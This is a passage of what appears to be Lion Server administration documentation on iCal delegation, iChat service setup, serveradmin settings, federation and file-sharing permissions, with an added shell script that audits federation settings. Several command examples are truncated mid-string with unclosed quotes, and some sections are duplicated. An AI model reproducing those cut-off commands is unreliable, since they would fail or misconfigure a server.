A read-only delegate is another user who can see your calendar items, including free-busy times, but not change them. Sometimes this is called a proxy user. This setting is useful for locations and resources: if you make a user or group a read-only delegate for the resource, the delegate can see the details of the resource's use, rather than only whether the resource is busy. Delegates can also be given read and write access to your calendar, so that another person can add or delete events on your calendar. This is a good feature for users with administrative assistants, but note that a read-write delegate has the same control over your events that you do. Delegates can only be chosen from iCal Server users in the same authentication directory as you. For example, if your user credentials are stored in a directory like Open Directory, the delegate must also be a user in your Open Directory system.

1. In iCal, open Preferences > Accounts.
2. Select the account to share with the delegate.
3. Select the Delegation tab.
4. Click the Edit button next to Manage access to my account.
5. In the sheet that drops down, click the Add button (+).
6. Enter the account name to designate as a delegate. If you want the delegate to be able to change your calendar, check Allow Write.
7. Click Done.

iChat service

Understanding iChat

Provide instant messaging


iChat Server provides instant messaging within and outside a server user's organization. iChat Server lets users collaborate by chatting and sharing information using instant messaging and data transfer. This real-time interaction between computer users promotes collaboration without the delay of mail responses and blog postings or the expense of telephone communication or face-to-face meetings. This collaboration might include:

Brainstorming solutions, making plans, reporting progress, and exchanging design images
Exchanging web links and files for use as real-time references, or for follow-up viewing
Generating iChat transcripts when you want a written record of interactions without taking notes
Conducting weekly staff or project meetings, which can also facilitate collaboration among geographically dispersed team members
Using built-in computer microphones for audio chat
Using video cameras for videoconferencing, a direct, personal, and engaging form of collaboration

Before starting iChat service, you may need to update your network's DNS records.

Start iChat service

1. In the Server app sidebar, select the service you want to start.
2. Click the On/Off switch to turn on the service.
3. If a dialog asks whether you want to allow Internet access to the service you turned on, click Allow to configure your AirPort device and make the service accessible to Internet users. Click Don't Allow if you don't want the service to be accessible to computers on the Internet, or if you're not sure.
   You can change Internet access to services later by selecting your AirPort device in the Server sidebar. For more information, see Manage AirPort port mapping and Wi-Fi login.
   The dialog appears only if your AirPort device is listed in the Server sidebar and you turned on a service that the Server app can manage on your AirPort device. These services include Address Book, iCal, iChat, Mail, and Web.

If you have an Internet router that isn't listed in the Server sidebar, you can configure it to allow Internet access to services. This process is called port forwarding or port mapping. For information, see Router port mapping.

Create a user account

You can create a user account for each person who uses the services provided by your server.

1. In the Users pane of the Server app, click the Add button (+).
2. In the Full Name field, enter the user's name. The name can be up to 255 characters (or as few as 85 Japanese characters), and can include spaces.
3. In the Account Name field, enter the user's short name. If you don't want to use the generated short name, enter a different short name. After the account is created, you can't change this short name. The short name typically is eight or fewer characters, but can be up to 255 Roman characters. Use only the characters a through z, A through Z, 0 through 9, . (period), _ (underscore), or - (hyphen).
   Note: If a user has a short name on a Mac, try to use the same short name for the user's account on the server. Having the same short name helps with the user's access to services.
4. Enter the user's password in the Password and Verify fields. You can use Password Assistant to help you choose a password. Click the button at the right of the Password field to see how secure the password is. The user can change this password in the Users & Groups pane of System Preferences on the user's computer.
5. To associate a picture with the user account, click the silhouette and select a standard picture, or click Edit Picture for a customized picture. When you click Edit Picture, you can take a picture with your computer's camera or choose a graphic file on your computer. After taking or choosing a picture, you can drag the picture to pan it, or use the slider to zoom it. When you finish customizing the picture, click Set.
6. Click Done to create the user account.

Allow iChat Buddies From Other Servers

iChat service can let your chat server communicate with other servers using iChat service, allowing buddies from servers besides your own. Server-to-server chat communication is called federation. If you want to control which servers can federate with yours, see Approve server-to-server chat connections. To establish communication between servers on different networks, administrators must configure domain name service (DNS), network address translation (NAT), and firewalls, as needed.

1. In the Server app, select the iChat service pane.
2. Click Enable server-to-server federation. If this is the first time you've enabled federation, a configuration sheet appears. Otherwise, click Edit to get the configuration sheet.
3. Select Require secure server-to-server federation to restrict communication to SSL encrypted connections. Secure federation requires the federated server to accept SSL encrypted connections; without this setting, messages exchanged with a peer server can cross the Internet in clear. You can change which SSL certificate is used for encryption by using the certificate management feature of Server app. For more information, see Use an SSL certificate.

Save chat transcripts

An iChat client can be configured to record its own chat transcripts. The iChat Server can also be configured to record all chat messages. The client recording capability is useful to the individual iChat user, while the server message logging capability is intended for administrative and auditing purposes. Chat transcripts are saved at /Library/Server/iChat/Data/message_archives. The archive is written in clear text even when clients connect over SSL, so treat that directory as sensitive: limit administrative access to the server and cover it in your backup and retention policy.

1. In the Server app, select the iChat service pane.
2. Click Archive all chat messages.

RELATED TOPICS

Provide instant messaging
Change a user's account settings
Change a user's group membership
Change a user's or group's name
Change a user's or group's picture
Delete a user account
Import users from another network account server
Allow iChat Buddies From Other Servers
Approve server-to-server chat connections
Save chat transcripts
About iChat Server technologies
About secure connections for iChat Server


iChat Service setup overview


Here is an overview of the steps for setting up iChat service.

Step 1: Configure and start Open Directory
iChat uses Open Directory to authenticate users, and it must be configured before you set up iChat. See Set up an Open Directory master.

Step 2: (Optional) Set up the Firewall service
If you are using a firewall, iChat requires specific ports to be open for iChat features to function. For more information about configuring Firewall service, see Configure for standard services and Configure for standard services (CLI).

Step 3: Turn the iChat service on
Before you configure iChat, turn it on. See Start a service.

Step 4: Configure iChat advanced settings
Configure additional settings to add host domains, select an SSL certificate, choose your authentication method, and enable server-to-server federation. See Configure iChat advanced settings.

Step 5: Configure iChat logging settings
Change message logging settings to specify where to archive the iChat message logs. Set syslog levels for service activity. See Log all iChat messages and Set iChat service error log levels.

Step 6: Restart iChat
Restart iChat on the server.


About integrating iChat service with directory services


As with other services, iChat authentication is based on Open Directory or any other Lightweight Directory Access Protocol (LDAP) server bound to the iChat Server.

Integrating with directory services: iChat accesses user accounts through directory services and does not access the LDAP server directly. You can also bind your server to other LDAP servers, enabling users on those LDAP servers to authenticate with your iChat Server.


Understanding iChat screen names


iChat screen names look a lot like email addresses. They consist of a user name and an associated iChat server. iChat screen names are Jabber IDs and use the general format user-short-name@iChat-domain-name (for example, nancy@ichat.example.com). The user-short-name component is the short name of a user defined in the Open Directory search path of the iChat Server. The iChat-domain-name component identifies the iChat Server. To use iChat, you must have a Jabber ID and you must know the Jabber IDs of everyone you want to chat with. Your Jabber ID is created when your user account is created in Open Directory.


Set up Open Directory before iChat service


iChat uses Open Directory to authenticate users and service access control lists (SACLs) to verify that users are authorized to use iChat. Before you can use iChat:

You must be defined in the Open Directory search path of that server.
You must be authorized to use iChat service on that server.


Clients for iChat service


You can use any Jabber client with iChat service: any instant messaging application works with iChat service as long as the application supports the Jabber (XMPP) protocol. iChat service supports instant messaging applications on Windows, Linux, and popular personal digital assistants (PDAs).


iChat configuration file locations


iChat configuration settings are stored in configuration files that correspond to the main jabberd process and to each of its component processes. These files define settings for the Jabber server and the XMPP features supported by Jabber.

Component                                    Location
jabberd (startup and watchdog script)        /etc/jabberd/jabberd.cfg
router (inter-module message routing)        /etc/jabberd/router.xml
sm (session manager)                         /etc/jabberd/sm.xml
c2s (client-to-server communications)        /etc/jabberd/c2s.xml
s2s (server-to-server communications)        /etc/jabberd/s2s.xml
Multi-user chat room configuration           /etc/jabberd/Rooms.plist


iChat service log locations


There are three log locations for iChat service:

The iChat service log is in /var/log/system.log.
The iChat file proxy log is in /private/var/jabberd/log/proxy65.log.
The iChat service migration log is in /Library/Logs/Migration/jabbermigrator.log.


Firewall ports for iChat service


iChat requires specific ports to be open on your server. If you have a firewall configured or you are using the Lion Server firewall, you must enable these ports before you can use iChat. If you run iChat Server on a secure network behind a firewall, you don't need to configure firewall settings as long as communication between users stays within the network. Firewall settings are required when communicating outside the firewall. Depending on the iChat functions you require, make sure the following ports are open, and open no more than you need.

Port
    Description

1080
    The SOCKS5 protocol uses this port for file transfers.
5060
    iChat Session Initiation Protocol (SIP), required to use audio or video chat.
5190
    iChat Instant Messenger (AIM). This is the only port required for basic Instant Messenger use with an AIM account; Jabber clients of iChat Server use 5222 or 5223 instead.
5222 TCP
    This port is used exclusively for TLS connections if an SSL certificate is enabled. Otherwise, this port is used for nonencrypted connections. TLS encryption is preferred, because TLS connections are more secure than legacy SSL connections.
5223 TCP
    This port is used for legacy SSL connections if an SSL certificate is enabled.
5269 TCP
    This port is used for encrypted TLS server-to-server connections, as well as nonencrypted connections. TLS encryption is preferred, because TLS connections are more secure than legacy SSL connections.
5678
    iChat uses this local UDP port to determine the user's external IP address.
5297, 5298
    Older versions of iChat use these ports for Bonjour IM. (Mac OS X v10.5 and later use dynamic ports.)
7777
    The Jabber Proxy65 module uses this port for the iChat Server file transfer proxy.
16402
    In Mac OS X 10.5 or later, this port can be used for SIP signaling.
16384-16403
    Mac OS X 10.4 and earlier use these ports for audio or video chat. Audio and video packets are sent using RTP and RTCP, and traffic is exchanged with .Mac (MobileMe) to determine the user's external port information.


Start or stop iChat service (CLI)


You can start and stop iChat service using the command line.

sudo serveradmin start jabber
sudo serveradmin stop jabber

Configuring iChat

Configure iChat advanced settings


You use serveradmin to add host domains, choose an SSL certificate and authentication method, and configure XMPP server-to-server federation settings.

Set the iChat authentication method

iChat supports three methods of authentication: standard, Kerberos, or any. The "standard" method enables all methods except plain authentication when SSL is not enabled. The "Kerberos" method enables only Kerberos authentication. The "any" method enables all possible authentication types, including plain-text passwords over an unencrypted connection, and is the least secure. Administrators must use Server app, Server Admin, or serveradmin to configure an Open Directory master (with Kerberos enabled) to allow Kerberos authentication. Otherwise, the server can be configured to use the Kerberos Key Distribution Center (KDC) on another host. However, the Kerberos realm hosted by the KDC must match the realm served by the iChat Server. Kerberos authentication is the most secure.

Use serveradmin via the Terminal app to change the setting. The default value for METHOD is ANYMETHOD. The other possible values are STANDARD and KERBEROS.

sudo serveradmin settings jabber:authLevel = "METHOD"

Command example:

sudo serveradmin settings jabber:authLevel = "STANDARD"

Use SSL encryption with iChat service

You can maximize the privacy of chats by implementing SSL with iChat service. SSL uses a digital certificate to validate the identity of the server and to establish secure, encrypted data exchanges for client-to-server and server-to-server connections. iChat uses SSL to encrypt chat messages that are sent over the network. However, if your iChat Server is logging chat messages, the messages are stored on the server in an unencrypted format. These unencrypted chat messages can be read by your server administrator, or by anyone who gains access to the server's disk or its backups. For information about message logging, see Set iChat service error log levels. The digital certificate can be a self-signed certificate or a certificate imported from a certificate authority. For information about defining, obtaining, and installing certificates on your server, see Use an SSL certificate.

Use serveradmin via the Terminal app to set the certificate locations. The default locations for the certificate authority PEM file and the key PEM file are /etc/certificates/cert.chain.pem and /etc/certificates/cert.concat.pem.

sudo serveradmin settings jabber:sslCAFile = "Certificate authority pem file location"
sudo serveradmin settings jabber:sslKeyFile = "Key file pem location"

Command example:

sudo serveradmin settings jabber:sslCAFile = "/etc/certificates/example.private.2413CD435CEA9484
sudo serveradmin settings jabber:sslKeyFile = "/etc/certificates/example.private.2413CD435CEA948

Use serveradmin via the Terminal app to set the network port for SSL traffic. The default value for port is 5223.

sudo serveradmin settings jabber:jabberdClientPortSSL = "port"

Command example:

sudo serveradmin settings jabber:jabberdClientPortSSL = "15223"

Set up iChat service on virtually hosted domains

You can provide iChat service to users of virtual domains on the server. iChat requires that your host have a host name, resolvable using DNS, that the iChat Server uses as the Jabber realm. Clients use this realm to connect to the service. Clients use a Jabber Identifier (JID) to authenticate and interact with the server. The JID uses the format user@realm (for example, chatuser@chatserver.example.com). In this example, your iChat Server would be configured to host the realm chatserver.example.com. DNS resolution directs clients to your server when they resolve that host name. To support multiple realms, DNS should be configured appropriately. For more information, see Overview of DNS setup.

Use serveradmin via the Terminal app to add hosted chat domains. The default value is the iChat server's host name. The other possible values are fully qualified domain names separated by commas.

sudo serveradmin settings jabber:hostsCommaDelimitedString = "FQDN,FQDN2"

Command example:

sudo serveradmin settings jabber:hostsCommaDelimitedString = "chatserver.example.com,chat.exampl

Set up server-to-server iChat communication

When S2S federation is enabled, communication with most other XMPP-compliant chat servers is enabled, including the ability to federate with other Jabber services like Google Talk. Using serveradmin, you can take advantage of additional options for securing S2S communications. These options include limiting the domains you can connect to. To establish communication between servers on different networks, administrators must configure domain name service (DNS), network address translation (NAT), and firewalls, as needed.

1. Use serveradmin via the Terminal app to define the network port for federation. The default value is 5269.

sudo serveradmin settings jabber:jabberdS2SPort = "port"

Command example:

sudo serveradmin settings jabber:jabberdS2SPort = "15269"

2. Use serveradmin via the Terminal app to require SSL connections for federation. The default value is no. The other possible value is yes. If you need to set SSL certificate information, see Use SSL encryption with iChat service.

sudo serveradmin settings jabber:requireSecureS2S = "setting"

Command example: sudo serveradmin settings jabber:requireSecureS2S = "yes" 3. Use serveradmin via the Terminal app to limit domains your server connects to. a. First, set the domain restriction flag. sudo serveradmin settings jabber:s2sRestrictDomains = "setting" The default value for setting is no. The other possible value is yes. Command example: sudo serveradmin settings jabber:s2sRestrictDomains = "yes" b. Create the lis t of allowed domains. sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = create sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = "domain name" sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = create sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = "domain name" Command example: sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = create sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = "otherserver.example.com" sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = create sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = "onemore.example.com"

User collaboration services

iChat service

Configuring iChat

Log all iChat messages


Use serveradmin to configure iChat to save chat messages in a location of your choice and to specify when to archive the message log. The iChat Server can also be configured to record all chat messages. The client recording capability is useful to the individual iChat user, while the server message logging capability is intended for administrative and auditing purposes. Archiving saves disk space by compressing older message logs. The compressed message archives are saved indefinitely until removed by the administrator.

1. Use serveradmin via the Terminal app to change the setting.
    sudo serveradmin settings jabber:enableSavedChats = "setting"
The default value for <setting> is yes. The other possible value is no.
Command example:
    sudo serveradmin settings jabber:enableSavedChats = "yes"

2. Use serveradmin via the Terminal app to set the message archive location.
    sudo serveradmin settings jabber:savedChatsLocation = "filepath"
The default value for filepath is /Library/Server/iChat/Data/message_archives.
Command example:
    sudo serveradmin settings jabber:savedChatsLocation = "/Volumes/StorageArray/iChat/Data/message_

3. Use serveradmin via the Terminal app to define how often the messages are archived.
    sudo serveradmin settings jabber:savedChatsArchiveInterval = "day_interval"
The default value for day_interval is 7.
Command example:
    sudo serveradmin settings jabber:savedChatsArchiveInterval = "14"


Use SSL encryption with iChat service


You can maximize the privacy of chats by implementing SSL with iChat service. SSL uses a digital certificate to validate the identity of the server and to establish secure, encrypted data exchanges for client-to-server and server-to-server connections. iChat uses SSL to encrypt chat messages that are sent over the network. However, if your iChat Server is logging chat messages, the messages are stored on the server in an unencrypted format. These unencrypted chat messages can be easily viewed by your server administrator. For information about message logging, see Set iChat service error log levels. The digital certificate can be a self-signed certificate or a certificate imported from a certificate authority. For information about defining, obtaining, and installing certificates on your server, see Use an SSL certificate.

Use serveradmin via the Terminal app to set the certificate locations to require encryption.
    sudo serveradmin settings jabber:sslCAFile = "Certificate authority pem file location"
    sudo serveradmin settings jabber:sslKeyFile = "Key file pem location"
The default locations for Certificate authority pem file location and Key file pem location are /etc/certificates/cert.chain.pem and /etc/certificates/cert.concat.pem.
Command example:
    sudo serveradmin settings jabber:sslCAFile = "/etc/certificates/example.private.2413CD435CEA9484
    sudo serveradmin settings jabber:sslKeyFile = "/etc/certificates/example.private.2413CD435CEA948

Use serveradmin via the Terminal app to set the network ports for SSL traffic.
    sudo serveradmin settings jabber:jabberdClientPortSSL = "port"
The default value for <port> is 5223.
Command example:
    sudo serveradmin settings jabber:jabberdClientPortSSL = "15223"


Set the iChat authentication method


iChat supports three methods of authentication: standard, Kerberos, or any. The "standard" method enables all methods except for plain authentication when no SSL is enabled. The "Kerberos" method enables only Kerberos authentication. The "any" method enables all possible authentication types. Administrators must use Server app, Server Admin, or serveradmin to configure an Open Directory master (with Kerberos enabled) to allow Kerberos authentication. Otherwise, the server can be configured to use the Kerberos Domain Controller (KDC) on another host. However, the Kerberos realm hosted by the KDC must match the realm served by the iChat Server. Kerberos authentication is the most secure.

Use serveradmin via the Terminal app to change the setting.
    sudo serveradmin settings jabber:authLevel = "METHOD"
The default value for <METHOD> is ANYMETHOD. The other possible values are STANDARD and KERBEROS.
Command example:
    sudo serveradmin settings jabber:authLevel = "STANDARD"


Turn auto-buddy support on


You can configure iChat preferences so that when user accounts are added through the Server app they become buddies. When users are removed, they are deleted from the buddies list.

Use serveradmin via the Terminal app to change the setting.
    sudo serveradmin settings jabber:enableAutoBuddy = "setting"
The default value for <setting> is yes. The other possible value is no.
Command example:
    sudo serveradmin settings jabber:enableAutoBuddy = "yes"


Set iChat service error log levels


Lion Server's iChat service uses the syslog for logging information about the service. You use serveradmin to change the amount of information sent to the log in order to debug service issues. The log levels add different amounts of data to the syslog. The higher the number, the more information is sent to the log:

Level name    Syslog level number
EMERGENCY     0
ALERT         1
CRITICAL      2
ERROR         3
WARNING       4
NOTICE        5
INFO          6
DEBUG         7

Use serveradmin via the Terminal app to change the log level.
    sudo serveradmin settings jabber:logLevel = "level"
The default value for level is ERROR. The other possible values are EMERGENCY, ALERT, CRITICAL, WARNING, NOTICE, INFO, and DEBUG.
Command example:
    sudo serveradmin settings jabber:logLevel = "DEBUG"


Change the iChat service domain


You can change the domain that is associated with your iChat service users. iChat requires that your host have a host name, resolvable using DNS, that is used as the Jabber realm by the iChat Server; clients use this realm to connect to the service. Clients use a Jabber Identifier (JID) to authenticate and interact with the server. The JID uses the format user@realm (for example, chatuser@chatserver.example.com). In this example, your iChat Server would be configured to host the realm chatserver.example.com.

Use serveradmin via the Terminal app to change the hosted domain.
    sudo serveradmin settings jabber:hostsCommaDelimitedString = "FQDN"
The default value for FQDN is the iChat server's host name.
Command example:
    sudo serveradmin settings jabber:hostsCommaDelimitedString = "newchatservername.example.com"

User collaboration services

iChat service

Federation and hosting

Set up server-to-server iChat communication


When S2S federation is enabled, communication with most other XMPP-compliant chat servers is enabled, including the ability to federate with other Jabber services like Google Talk. Using serveradmin, you can take advantage of additional options for securing S2S communications. These options include limiting the domains you can connect to. To establish communication between servers on different networks, administrators must configure the domain name server (DNS), network address translation (NAT), and firewalls, as needed.

1. Use serveradmin via the Terminal app to define the network port for federation.
    sudo serveradmin settings jabber:jabberdS2SPort = "port"
The default value for port is 5269.
Command example:
    sudo serveradmin settings jabber:jabberdS2SPort = "15269"

2. Use serveradmin via the Terminal app to require SSL connections for federation.
    sudo serveradmin settings jabber:requireSecureS2S = "setting"
The default value for setting is no. The other possible value is yes. If you need to set SSL certificate information, see Use SSL encryption with iChat service.
Command example:
    sudo serveradmin settings jabber:requireSecureS2S = "yes"

3. Use serveradmin via the Terminal app to limit the domains your server connects to.
a. First, set the domain restriction flag.
    sudo serveradmin settings jabber:s2sRestrictDomains = "setting"
The default value for setting is no. The other possible value is yes.
Command example:
    sudo serveradmin settings jabber:s2sRestrictDomains = "yes"
b. Create the list of allowed domains.
    sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = create
    sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = "domain name"
    sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = create
    sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = "domain name"
Command example:
    sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = create
    sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = "otherserver.example.com"
    sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = create
    sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = "onemore.example.com"
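The following script is an added example, not code from the Lion Server guide: it audits a `serveradmin settings jabber` dump for the three settings this procedure changes (secure S2S, domain restriction with a non-empty allow list, and a non-"any" authentication level) and generates the step 3b commands for a list of domains after checking that each is a plausible FQDN. The sample dump is constructed, and the `_array_index` key name it uses for list entries is an assumption; the parser accepts any `jabber:s2sAllowedDomains` array key.

```shell
#!/bin/sh
# Added example, not from the Lion Server guide: audit the jabber settings that
# the server-to-server procedure changes, and generate the serveradmin commands
# for the allowed-domain list.
#
# SAMPLE_SETTINGS is CONSTRUCTED text in the "key = value" shape that
# `sudo serveradmin settings jabber` prints (the exact array key name in real
# output is an assumption). On a server, pipe the live output into audit_s2s.
SAMPLE_SETTINGS='jabber:jabberdS2SPort = 5269
jabber:requireSecureS2S = no
jabber:s2sRestrictDomains = yes
jabber:s2sAllowedDomains:_array_index:0 = "otherserver.example.com"
jabber:s2sAllowedDomains:_array_index:1 = "onemore.example.com"
jabber:authLevel = "ANYMETHOD"'

# get_setting KEY: print KEY's value from a settings dump on stdin, quotes
# stripped. The values audited here never contain spaces, so field 3 is whole.
get_setting() {
    awk -v key="$1" '$1 == key && $2 == "=" { v = $3; gsub(/"/, "", v); print v; exit }'
}

# audit_s2s: read a settings dump on stdin, print one finding per line and
# return 0 only if federation is encrypted, domain-restricted and plain
# authentication is not possible.
audit_s2s() {
    dump=$(cat)
    rc=0
    secure=$(printf '%s\n' "$dump" | get_setting jabber:requireSecureS2S)
    if [ "$secure" = "yes" ]; then
        echo "OK   requireSecureS2S=yes"
    else
        echo "FAIL requireSecureS2S=${secure:-unset}: unencrypted server-to-server links are accepted"
        rc=1
    fi
    restrict=$(printf '%s\n' "$dump" | get_setting jabber:s2sRestrictDomains)
    if [ "$restrict" != "yes" ]; then
        echo "FAIL s2sRestrictDomains=${restrict:-unset}: any XMPP domain may federate"
        rc=1
    else
        # count allow-list entries; `|| true` keeps grep's exit 1 on zero matches harmless
        n=$(printf '%s\n' "$dump" | grep -c '^jabber:s2sAllowedDomains:_array_[a-z]*:[0-9][0-9]* = ' || true)
        if [ "$n" -eq 0 ]; then
            echo "FAIL s2sRestrictDomains=yes but the allowed-domain list is empty"
            rc=1
        else
            echo "OK   s2sRestrictDomains=yes with $n allowed domain(s)"
        fi
    fi
    auth=$(printf '%s\n' "$dump" | get_setting jabber:authLevel)
    case "$auth" in
        STANDARD|KERBEROS) echo "OK   authLevel=$auth" ;;
        *) echo "FAIL authLevel=${auth:-unset}: plain authentication without SSL is possible"; rc=1 ;;
    esac
    return $rc
}

# is_fqdn NAME: accept only dotted host names made of letters, digits, '.' and '-'
is_fqdn() {
    case "$1" in
        ''|*[!A-Za-z0-9.-]*|.*|*.|*..*|*.-*|*-.*) return 1 ;;
        *.*) return 0 ;;
        *) return 1 ;;
    esac
}

# s2s_allowlist_commands DOMAIN...: print the serveradmin commands from step 3b
# (a create line and a value line per _array_id), rejecting bad names before
# anything would be written to the server.
s2s_allowlist_commands() {
    i=0
    for d in "$@"; do
        if ! is_fqdn "$d"; then
            echo "refusing to emit commands: '$d' is not a fully qualified domain name" >&2
            return 1
        fi
        echo "sudo serveradmin set jabber:s2sAllowedDomains:_array_id:$i = create"
        echo "sudo serveradmin set jabber:s2sAllowedDomains:_array_id:$i = \"$d\""
        i=$((i + 1))
    done
}

# Run as `sh s2s_audit.sh --demo` to see both functions applied to the sample dump.
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_SETTINGS" | audit_s2s
    s2s_allowlist_commands otherserver.example.com onemore.example.com
fi
```

On a live server, `sudo serveradmin settings jabber | sh -c '. ./s2s_audit.sh; audit_s2s'` runs the same checks against the real configuration, and the generated command lines can be reviewed before being executed.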


Use certificates to secure server-to-server iChat communication


Using serveradmin, you can secure server-to-server communication with certificates. Lion Server includes a preinstalled, default, self-signed certificate, or you can select your own certificate. The selected certificate is used for client-to-server communications on ports 5222 and 5223 and for server-to-server communications. Jabber provides the following ports:
5222, which accepts TLS connections if an SSL certificate is enabled
5223, which accepts legacy SSL connections if an SSL certificate is enabled
SSL encrypts your chat messages over the network for client-to-server and server-to-server connections. However, if your iChat Server is logging chat messages, your messages are stored in an unencrypted format that can be easily viewed by the server administrator. For information about message logging, see Log all iChat messages.
Requiring secure S2S communication restricts federation so that iChat connects only with servers that support encrypted connections through SSL/TLS. This means that only servers that support TLS are allowed to communicate with your iChat Server. This option requires a Secure Sockets Layer (SSL) certificate to be installed, which is used to secure the S2S federation. For more information, see Use SSL encryption with iChat service.

1. If SSL encryption hasn't been enabled yet, use serveradmin via the Terminal app to set the certificate locations to require encryption.
    sudo serveradmin settings jabber:sslCAFile = "Certificate authority pem file location"
    sudo serveradmin settings jabber:sslKeyFile = "Key file pem location"
The default locations for Certificate authority pem file location and Key file pem location are /etc/certificates/cert.chain.pem and /etc/certificates/cert.concat.pem.
Command example:
    sudo serveradmin settings jabber:sslCAFile = "/etc/certificates/example.private.2413CD435CEA9484
    sudo serveradmin settings jabber:sslKeyFile = "/etc/certificates/example.private.2413CD435CEA948

2. Use serveradmin via the Terminal app to require encrypted server-to-server communication.
    sudo serveradmin settings jabber:requireSecureS2S = "setting"
The default value for setting is no. The other possible value is yes.
Command example:
    sudo serveradmin settings jabber:requireSecureS2S = "yes"


Set up iChat service on virtually hosted domains


You can provide iChat service to users of virtual domains on the server. iChat requires that your host have a host name, resolvable using DNS, that is used as the Jabber realm by the iChat Server; clients use this realm to connect to the service. Clients use a Jabber Identifier (JID) to authenticate and interact with the server. The JID uses the format user@realm (for example, chatuser@chatserver.example.com). In this example, your iChat Server would be configured to host the realm chatserver.example.com. DNS resolution directs clients to your server when they resolve that host name. To support multiple realms, DNS should be configured appropriately. For more information, see Overview of DNS setup.

Use serveradmin via the Terminal app to add hosted chat domains.
    sudo serveradmin settings jabber:hostsCommaDelimitedString = "FQDN,FQDN2"
The default value for FQDN is the iChat server's host name. The other possible values are fully qualified domain names separated by commas.
Command example:
    sudo serveradmin settings jabber:hostsCommaDelimitedString = "chatserver.example.com,chat.example


Set administrative permissions for iChat


Use Server Admin to set SACL permissions for administrators to monitor and manage iChat.

1. Open Server Admin and connect to the server.
2. Click Access.
3. Click Administrators.
4. Select the level of restriction you want for the services. To restrict access to all services, select "For all services." To set access permissions for individual services, select "For selected services below" and select the services from the Service list.
5. Click the Add button (+) to open the Users & Groups window.
6. Drag users and groups to the list from the Users & Groups window.
7. Set the user's permission. To grant administrator access, choose Administer from the Permission pop-up menu next to the user name. To grant monitoring access, choose Monitor from the Permission pop-up menu next to the user name.
8. Click Save.

User collaboration services

File Sharing

Enable file sharing for a folder


To let users access a specific folder from a computer or iOS device, you designate that folder as a shared folder. You must enable file sharing before you can designate shared folders. Some folders are enabled as shared folders by default.

These are indicated in the main File Sharing window of Server app.

1. To add a new shared folder, click plus (+) at the bottom of the window.
2. Navigate to your chosen volume or folder.
3. Click Choose. The folder you selected is now enabled as a shared folder. If File Sharing is off when you add a new shared folder, File Sharing will be turned on.
RELATED INFORMATION

Control access to a shared folder
Choose which kinds of computers and devices can access file shares
Enable shared home folders


Control access to a shared folder


You can enable or disable access to each shared folder listed in the File Sharing pane of the Server app. You can specify which users and groups have read and write access to each shared folder and its contents. You can give access to all users with accounts on your server, or only the specific users and groups you select. You can also allow guest access for any shared folder. Enable file sharing if it isn't already enabled.

1. In the File Sharing pane of the Server app, select the shared folder in the list.
2. Double-click the selected folder or click the pencil icon.
3. To change the access users or groups have to a shared folder and its contents, select "Read & Write," "Read Only," "Write Only," or "No Access" next to that user or group name, then change it to the needed access level. You can also add or delete users and groups that have access to a shared folder by clicking Add (+) or Delete (-).
4. To let users access a folder without logging in, select the checkbox labeled "Allow guest users to access this share." The access level changes the next time the user or group connects to the shared folder.
RELATED INFORMATION

Create a user account
Kinds of permissions
Access control lists (ACLs)


Choose which kinds of computers and devices can access file shares
File sharing service in Lion Server lets you specify a protocol that other computers or devices use to access your file shares. Disabling or enabling certain protocols lets you determine which kinds of computers and devices connect to your server. Enable file sharing if it isn't already enabled.

1. In the File Sharing pane of the Server app, select the shared folder in the list.
2. Double-click the selected folder or click the pencil icon.
3. Click to select the checkboxes for sharing with Mac, Windows, or iOS devices. To use a file share as a home folder, enable Mac or Windows as needed for the share. You can select one or all three file sharing protocols for any share. If you don't select a protocol, the file share becomes unavailable. Users need to log out and log in again before using the shared folder as their home folder.

RELATED INFORMATION

Enable shared home folders


Enable shared home folders


Computers on the same network as your file sharing server can use shared folders for user home folders. Designating a shared folder as a home folder causes the user's computer to connect to your file sharing server, and when the user logs in, they begin using that shared folder as their home folder. Enable file sharing if it isn't already enabled.

1. In the File Sharing pane of the Server app, select the shared folder in the list.
2. Double-click the folder or click the pencil icon.
3. Click to select "Make available for home directories."
4. Choose "AFP for Mac computers only" or "SMB for Mac and Windows computers," depending on the computer the users use to connect to your file sharing server. Users must log out and log in again before using the shared folder as their home folder.
RELATED INFORMATION

Choose which kinds of computers and devices can access file shares

User collaboration services

File Sharing

File permissions

About permissions

Permissions in the Mac OS X Lion environment


An important aspect of computer security involves granting and denying permissions. A permission is the ability to perform a specific operation, such as gaining access to data or executing code. Permissions are granted at the level of folders, files, or applications. Use the Server app to set up file service permissions.

The term privileges refers to the combination of ownership and permissions, while the term permissions refers to the permission settings that each user category can have (Read & Write, Read Only, Write Only, and None).

If you're new to Mac OS X Lion and aren't familiar with UNIX-based systems, there are differences in the way ownership and permissions are handled compared to Windows. To increase security and reliability, Mac OS X Lion sets many system folders (for example, /Library/) to be owned by the root user (literally, a user named root). You can't change or delete files and folders unless you're logged in as root. Be careful: there are few restrictions on what you can do when you log in as root, and changes to system data can cause problems. An alternative to logging in as root is to use the sudo command.

Note: The Finder calls the root user system.

By default, files and folders are owned by the user who creates them. After they're created, items keep their privileges (a combination of ownership and permissions) even when moved, unless the privileges are explicitly changed by their owner or an administrator. Therefore, new files and folders you create aren't accessible by users if they're created in a folder that users don't have privileges for. When setting up share points, make sure that items have the correct access privileges for the users you want to share them with.


Kinds of permissions
Mac OS X Lion supports two kinds of file and folder permissions:
Standard Portable Operating System Interface (POSIX) permissions
Access Control Lists (ACLs)

